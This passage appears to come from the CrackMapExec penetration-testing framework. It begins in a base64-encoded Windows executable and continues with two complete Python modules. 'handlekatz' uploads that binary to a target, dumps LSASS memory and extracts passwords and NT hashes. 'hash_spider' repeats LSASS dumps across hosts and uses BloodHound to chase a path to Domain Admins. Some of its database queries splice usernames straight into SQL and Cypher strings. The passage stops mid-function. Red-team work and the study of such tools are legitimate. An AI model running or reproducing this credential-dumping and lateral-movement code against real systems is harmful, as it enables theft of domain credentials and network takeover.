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AiJgEAAAAAACwmAQAAAAAANiYBAAAAAABCJgEAAAAAAEomAQAAAAAAVCYBAAAAAABeJgEAAAAAAGYmAQAAAAAAbiYBAAAAAAB4JgEAAAAAAIAmAQAAAAAAiiYBAAAAAACSJgEAAAAAAJomAQAAAAAApCYBAAAAAACyJgEAAAAAALwmAQAAAAAAxiYBAAAAAADQJgEAAAAAANomAQAAAAAA5CYBAAAAAADwJgEAAAAAAPomAQAAAAAABCcBAAAAAAAOJwEAAAAAABonAQAAAAAAAAAAAAAAAADkAENyeXB0U3RyaW5nVG9CaW5hcnlBAAAbAURlbGV0ZUNyaXRpY2FsU2VjdGlvbgA/AUVudGVyQ3JpdGljYWxTZWN0aW9uAAB2AkdldExhc3RFcnJvcgAA5wJHZXRTdGFydHVwSW5mb0EAfANJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uAJcDSXNEQkNTTGVhZEJ5dGVFeAAA2ANMZWF2ZUNyaXRpY2FsU2VjdGlvbgAADARNdWx0aUJ5dGVUb1dpZGVDaGFyAHIFU2V0VW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAIIFU2xlZXAApQVUbHNHZXRWYWx1ZQDOBVZpcnR1YWxBbGxvYwAA1AVWaXJ0dWFsUHJvdGVjdAAA1gVWaXJ0dWFsUXVlcnkAAAsGV2lkZUNoYXJUb011bHRpQnl0ZQBLBmxzdHJsZW5BAAA4AF9fQ19zcGVjaWZpY19oYW5kbGVyAABAAF9fX2xjX2NvZGVwYWdlX2Z1bmMAQwBfX19tYl9jdXJfbWF4X2Z1bmMAAFIAX19nZXRtYWluYXJncwBTAF9faW5pdGVudgBUAF9faW9iX2Z1bmMAAFsAX19sY29udl9pbml0AABhAF9fc2V0X2FwcF90eXBlAABjAF9fc2V0dXNlcm1hdGhlcnIAAHIAX2FjbWRsbgB5AF9hbXNnX2V4aXQAAIsAX2NleGl0AACXAF9jb21tb2RlAAC+AF9lcnJubwAA3ABfZm1vZGUAAB0BX2luaXR0ZXJtAIMBX2xvY2sAKQJfb25leGl0AMoCX3VubG9jawCKA2Fib3J0AJcDYXRvaQAAmwNjYWxsb2MAAKgDZXhpdAAAvANmcHJpbnRmAL4DZnB1dGMAwwNmcmVlAADQA2Z3cml0ZQAA+QNsb2NhbGVjb252AAD/A21hbGxvYwAABwRtZW1jcHkAAAkEbWVtc2V0AAAnBHNpZ25hbAAANgRzdHJjaHIAADwEc3RyZXJyb3IAAD4Ec3RybGVuAABBBHN0cm5jbXAARwRzdHJzdHIAAGMEdmZwcmludGYAAH0Ed2NzbGVuAAAAIAEAQ1JZUFQzMi5kbGwAFCABABQgAQAUIAEAFCABABQgAQAUIAEAFCABABQgAQAUIAEAFCABABQgAQAUIAEAFCABABQgAQAUIAEAFCABAEtFUk5FTDMyLmRsbAAAAAAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQBtc3ZjcnQuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEARQAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQQAAAAAAAkBlAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4BlAAAAAAACwGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n )\n self.handlekatz = \"handlekatz.exe\"\n self.handlekatz_path = \"/tmp/\"\n self.dir_result = self.handlekatz_path\n self.useembeded = True\n\n if \"HANDLEKATZ_PATH\" in module_options:\n self.handlekatz_path = module_options[\"HANDLEKATZ_PATH\"]\n self.useembeded = False\n\n if \"HANDLEKATZ_EXE_NAME\" in module_options:\n self.handlekatz = module_options[\"HANDLEKATZ_EXE_NAME\"]\n\n if \"TMP_DIR\" in module_options:\n self.tmp_dir = module_options[\"TMP_DIR\"]\n\n if \"DIR_RESULT\" in module_options:\n self.dir_result = module_options[\"DIR_RESULT\"]\n\n def on_admin_login(self, context, connection):\n if self.useembeded:\n with open(self.handlekatz_path + self.handlekatz, \"wb\") as handlekatz:\n handlekatz.write(self.handlekatz_embeded)\n\n context.log.display(f\"Copy {self.handlekatz_path + self.handlekatz} to {self.tmp_dir}\")\n with open(self.handlekatz_path + self.handlekatz, \"rb\") as handlekatz:\n try:\n connection.conn.putFile(self.share, self.tmp_share + self.handlekatz, handlekatz.read)\n context.log.success(f\"[OPSEC] Created file {self.handlekatz} on the \\\\\\\\{self.share}{self.tmp_share}\")\n except Exception as e:\n context.log.fail(f\"Error writing file to share {self.share}: {e}\")\n\n # get LSASS PID via `tasklist`\n command = 'tasklist /v /fo csv | findstr /i \"lsass\"'\n context.log.display(f\"Getting lsass PID via command {command}\")\n p = connection.execute(command, True)\n context.log.debug(f\"Command Result: {p}\")\n if len(p) == 1:\n p = p[0]\n\n if not p or p == \"None\":\n context.log.fail(f\"Failed to execute command to get LSASS PID\")\n return\n # we get a CSV string back from `tasklist`, so we grab the PID from it\n pid = p.split(\",\")[1][1:-1]\n context.log.debug(f\"pid: {pid}\")\n\n command = self.tmp_dir + self.handlekatz + \" --pid:\" + pid + \" --outfile:\" + self.tmp_dir + \"%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log\"\n context.log.display(f\"Executing command {command}\")\n\n p = connection.execute(command, True)\n context.log.debug(f\"Command result: {p}\")\n\n if \"Lsass dump is complete\" in p:\n context.log.success(\"Process lsass.exe was successfully dumped\")\n dump = True\n else:\n context.log.fail(\"Process lsass.exe error un dump, try with verbose\")\n dump = False\n\n if dump:\n regex = r\"([A-Za-z0-9-]*\\.log)\"\n matches = re.search(regex, str(p), re.MULTILINE)\n if not matches:\n context.log.display(\"Error getting the lsass.dmp file name\")\n sys.exit(1)\n\n machine_name = matches.group()\n context.log.display(f\"Copy {machine_name} to host\")\n\n with open(self.dir_result + machine_name, \"wb+\") as dump_file:\n try:\n connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)\n context.log.success(f\"Dumpfile of lsass.exe was transferred to {self.dir_result + machine_name}\")\n except Exception as e:\n context.log.fail(f\"Error while get file: {e}\")\n\n try:\n connection.conn.deleteFile(self.share, self.tmp_share + self.handlekatz)\n context.log.success(f\"Deleted handlekatz file on the {self.share} share\")\n except Exception as e:\n context.log.fail(f\"[OPSEC] Error deleting handlekatz file on share {self.share}: {e}\")\n\n try:\n connection.conn.deleteFile(self.share, self.tmp_share + machine_name)\n context.log.success(f\"Deleted lsass.dmp file on the {self.share} share\")\n except Exception as e:\n context.log.fail(f\"[OPSEC] Error deleting lsass.dmp file on share {self.share}: {e}\")\n\n h_in = open(self.dir_result + machine_name, \"rb\")\n h_out = open(self.dir_result + machine_name + \".decode\", \"wb\")\n\n bytes_in = bytearray(h_in.read())\n bytes_in_len = len(bytes_in)\n\n context.log.display(f\"Deobfuscating, this might take a while (size: {bytes_in_len} bytes)\")\n\n chunks = [bytes_in[i : i + 1000000] for i in range(0, bytes_in_len, 1000000)]\n for chunk in chunks:\n for i in range(0, len(chunk)):\n chunk[i] ^= 0x41\n\n h_out.write(bytes(chunk))\n\n with open(self.dir_result + machine_name + \".decode\", \"rb\") as dump:\n try:\n credz_bh = []\n try:\n pypy_parse = pypykatz.parse_minidump_external(dump)\n except Exception as e:\n pypy_parse = None\n context.log.fail(f\"Error parsing minidump: {e}\")\n\n ssps = [\n \"msv_creds\",\n \"wdigest_creds\",\n \"ssp_creds\",\n \"livessp_creds\",\n \"kerberos_creds\",\n \"credman_creds\",\n \"tspkg_creds\",\n ]\n for luid in pypy_parse.logon_sessions:\n for ssp in ssps:\n for cred in getattr(pypy_parse.logon_sessions[luid], ssp, []):\n domain = getattr(cred, \"domainname\", None)\n username = getattr(cred, \"username\", None)\n password = getattr(cred, \"password\", None)\n NThash = getattr(cred, \"NThash\", None)\n if NThash is not None:\n NThash = NThash.hex()\n if username and (password or NThash) and \"$\" not in username:\n print_pass = password if password else NThash\n context.log.highlight(domain + \"\\\\\" + username + \":\" + print_pass)\n if \".\" not in domain and domain.upper() in connection.domain.upper():\n domain = connection.domain\n credz_bh.append(\n {\n \"username\": username.upper(),\n \"domain\": domain.upper(),\n }\n )\n if len(credz_bh) > 0:\n add_user_bh(credz_bh, None, context.log, connection.config)\n except Exception as e:\n context.log.fail(\"Error opening dump file\", str(e))\n" }, { "path": "cme/modules/hash_spider.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author: Peter Gormington (@hackerm00n on Twitter)\nimport logging\nfrom sqlite3 import connect\nfrom sys import exit\nfrom neo4j import GraphDatabase, basic_auth\nfrom neo4j.exceptions import AuthError, ServiceUnavailable\nfrom lsassy.dumper import Dumper\nfrom lsassy.parser import Parser\nfrom lsassy.session import Session\nfrom lsassy.impacketfile import ImpacketFile\n\ncredentials_data = []\nadmin_results = []\nfound_users = []\nreported_da = []\n\n\ndef neo4j_conn(context, connection, driver):\n if connection.config.get(\"BloodHound\", \"bh_enabled\") != \"False\":\n context.log.display(\"Connecting to Neo4j/Bloodhound.\")\n try:\n session = driver.session()\n list(session.run(\"MATCH (g:Group) return g LIMIT 1\"))\n context.log.display(\"Connection Successful!\")\n except AuthError as e:\n context.log.fail(\"Invalid credentials\")\n except ServiceUnavailable as e:\n context.log.fail(\"Could not connect to neo4j database\")\n except Exception as e:\n context.log.fail(\"Error querying domain admins\")\n context.log.debug(e)\n else:\n context.log.fail(\"BloodHound not marked enabled. Check cme.conf\")\n exit(1)\n\n\ndef neo4j_local_admins(context, driver):\n global admin_results\n try:\n session = driver.session()\n admins = session.run(\"MATCH (c:Computer) OPTIONAL MATCH (u1:User)-[:AdminTo]->(c) OPTIONAL MATCH (u2:User)-[:MemberOf*1..]->(:Group)-[:AdminTo]->(c) WITH COLLECT(u1) + COLLECT(u2) AS TempVar,c UNWIND TempVar AS Admins RETURN c.name AS COMPUTER, COUNT(DISTINCT(Admins)) AS ADMIN_COUNT,COLLECT(DISTINCT(Admins.name)) AS USERS ORDER BY ADMIN_COUNT DESC\") # This query pulls all PCs and their local admins from Bloodhound. Based on: https://github.com/xenoscr/Useful-BloodHound-Queries/blob/master/List-Queries.md and other similar posts\n context.log.success(\"Admins and PCs obtained.\")\n except Exception:\n context.log.fail(\"Could not pull admins\")\n exit()\n admin_results = [record for record in admins.data()]\n\n\ndef create_db(local_admins, dbconnection, cursor):\n cursor.execute(\"\"\"CREATE TABLE if not exists pc_and_admins (\"pc_name\" TEXT UNIQUE, \"local_admins\" TEXT, \"dumped\" TEXT)\"\"\")\n for result in local_admins:\n cursor.execute(\n \"INSERT OR IGNORE INTO pc_and_admins(pc_name, local_admins, dumped) VALUES(?, ?, ?)\",\n (\n result.get(\"COMPUTER\"),\n str(\n result.get(\"USERS\"),\n ),\n \"FALSE\",\n ),\n )\n dbconnection.commit()\n cursor.execute(\"\"\"CREATE TABLE if not exists admin_users(\"username\" TEXT UNIQUE, \"hash\" TEXT, \"password\" TEXT)\"\"\")\n admin_users = []\n for result in local_admins:\n for user in result.get(\"USERS\"):\n if user not in admin_users:\n admin_users.append(user)\n for user in admin_users:\n cursor.execute(\"\"\"INSERT OR IGNORE INTO admin_users(username) VALUES(?)\"\"\", [user])\n dbconnection.commit()\n\n\ndef process_creds(context, connection, credentials_data, dbconnection, cursor, driver):\n if connection.args.local_auth:\n context.log.extra[\"host\"] = connection.conn.getServerDNSDomainName()\n else:\n context.log.extra[\"host\"] = connection.domain\n context.log.extra[\"hostname\"] = connection.host.upper()\n for result in credentials_data:\n username = result[\"username\"].upper().split(\"@\")[0]\n nthash = result[\"nthash\"]\n password = result[\"password\"]\n if result[\"password\"] is not None:\n context.log.highlight(f\"Found a cleartext password for: {username}:{password}. Adding to the DB and marking user as owned in BH.\")\n cursor.execute(\n \"UPDATE admin_users SET password = ? WHERE username LIKE '\" + username + \"%'\",\n [password],\n )\n username = f\"{username.upper()}@{context.log.extra['host'].upper()}\"\n dbconnection.commit()\n session = driver.session()\n session.run('MATCH (u) WHERE (u.name = \"' + username + '\") SET u.owned=True RETURN u,u.name,u.owned')\n if nthash == \"aad3b435b51404eeaad3b435b51404ee\" or nthash == \"31d6cfe0d16ae931b73c59d7e0c089c0\":\n context.log.fail(f\"Hash for {username} is expired.\")\n elif username not in found_users and nthash is not None:\n context.log.highlight(f\"Found hashes for: '{username}:{nthash}'. Adding them to the DB and marking user as owned in BH.\")\n found_users.append(username)\n cursor.execute(\n \"UPDATE admin_users SET hash = ? WHERE username LIKE '\" + username + \"%'\",\n [nthash],\n )\n dbconnection.commit()\n username = f\"{username.upper()}@{context.log.extra['host'].upper()}\"\n session = driver.session()\n session.run('MATCH (u) WHERE (u.name = \"' + username + '\") SET u.owned=True RETURN u,u.name,u.owned')\n path_to_da = session.run(\"MATCH p=shortestPath((n)-[*1..]->(m)) WHERE n.owned=true AND m.name=~ '.*DOMAIN ADMINS.*' RETURN p\")\n paths = [record for record in path_to_da.data()]\n\n for path in paths:\n if path:\n for key, value in path.items():\n for item in value:\n if type(item) == dict:\n if {item[\"name\"]} not in reported_da:\n context.log.success(f\"You have a valid path to DA as {item['name']}.\")\n reported_da.append({item[\"name\"]})\n exit()\n\n\ndef initial_run(connection, cursor):\n username = connection.username\n password = getattr(connection, \"password\", \"\")\n nthash = getattr(connection, \"nthash\", \"\")\n cursor.execute(\n \"UPDATE admin_users SET password = ? WHERE username LIKE '\" + username + \"%'\",\n [password],\n )\n cursor.execute(\n \"UPDATE admin_users SET hash = ? WHERE username LIKE '\" + username + \"%'\",\n [nthash],\n )\n\n\nclass CMEModule:\n name = \"hash_spider\"\n description = \"Dump lsass recursively from a given hash using BH to find local admins\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n self.reset = None\n self.reset_dumped = None\n self.method = None\n @staticmethod\n def save_credentials(context, connection, domain, username, password, lmhash, nthash):\n host_id = context.db.get_computers(connection.host)[0][0]\n if password is not None:\n credential_type = 'plaintext'\n else:\n credential_type = 'hash'\n password = ':'.join(h for h in [lmhash, nthash] if h is not None)\n context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id)\n def options(self, context, module_options):\n \"\"\"\n METHOD Method to use to dump lsass.exe with lsassy\n RESET_DUMPED Allows re-dumping of hosts. (Default: False)\n RESET Reset DB. (Default: False)\n \"\"\"\n self.method = \"comsvcs\"\n if \"METHOD\" in module_options:\n self.method = module_options[\"METHOD\"]\n self.reset_dumped = module_options.get(\"RESET_DUMPED\", False)\n self.reset = module_options.get(\"RESET\", False)\n\n def run_lsassy(self, context, connection, cursor): # copied and pasted from lsassy_dumper & added cursor\n # lsassy uses a custom \"success\" level, which requires initializing its logger or an error will be thrown\n # lsassy also removes all other handlers and overwrites the formatter which is bad (we want ours)\n # so what we do is define \"success\" as a logging level, then do nothing with the output\n logging.addLevelName(25, \"SUCCESS\")\n setattr(logging, \"success\", lambda message, *args: ())\n\n host = connection.host\n domain_name = connection.domain\n username = connection.username\n password = getattr(connection, \"password\", \"\")\n lmhash = getattr(connection, \"lmhash\", \"\")\n nthash = getattr(connection, \"nthash\", \"\")\n session = Session()\n session.get_session(\n address=host,\n target_ip=host,\n port=445,\n lmhash=lmhash,\n nthash=nthash,\n username=username,\n password=password,\n domain=domain_name,\n )\n if session.smb_session is None:\n context.log.fail(\"Couldn't connect to remote host. Password likely expired/changed. Removing from DB.\")\n cursor.execute(f\"UPDATE admin_users SET hash = NULL WHERE username LIKE '{username}'\")\n return False\n dumper = Dumper(session, timeout=10, time_between_commands=7).load(self.method)\n if dumper is None:\n context.log.fail(\"Unable to load dump method '{}'\".format(self.method))\n return False\n file = dumper.dump()\n if file is None:\n context.log.fail(\"Unable to dump lsass\")\n return False\n credentials, tickets, masterkeys = Parser(file).parse()\n file.close()\n ImpacketFile.delete(session, file.get_file_path())\n if credentials is None:\n credentials = []\n credentials = [cred.get_object() for cred in credentials if not cred.get_username().endswith(\"$\")]\n credentials_unique = []\n credentials_output = []\n for cred in credentials:\n if [\n cred[\"domain\"],\n cred[\"username\"],\n cred[\"password\"],\n cred[\"lmhash\"],\n cred[\"nthash\"],\n ] not in credentials_unique:\n credentials_unique.append(\n [\n cred[\"domain\"],\n cred[\"username\"],\n cred[\"password\"],\n cred[\"lmhash\"],\n cred[\"nthash\"],\n ]\n )\n credentials_output.append(cred)\n self.save_credentials(context, connection, cred[\"domain\"], cred[\"username\"], cred[\"password\"], cred[\"lmhash\"], cred[\"nthash\"])\n global credentials_data\n credentials_data = credentials_output\n\n def spider_pcs(self, context, connection, cursor, dbconnection, driver):\n cursor.execute(\"SELECT * from admin_users WHERE hash is not NULL\")\n compromised_users = cursor.fetchall()\n cursor.execute(\"SELECT pc_name,local_admins FROM pc_and_admins WHERE dumped LIKE 'FALSE'\")\n admin_access = cursor.fetchall()\n for user in compromised_users:\n for pc 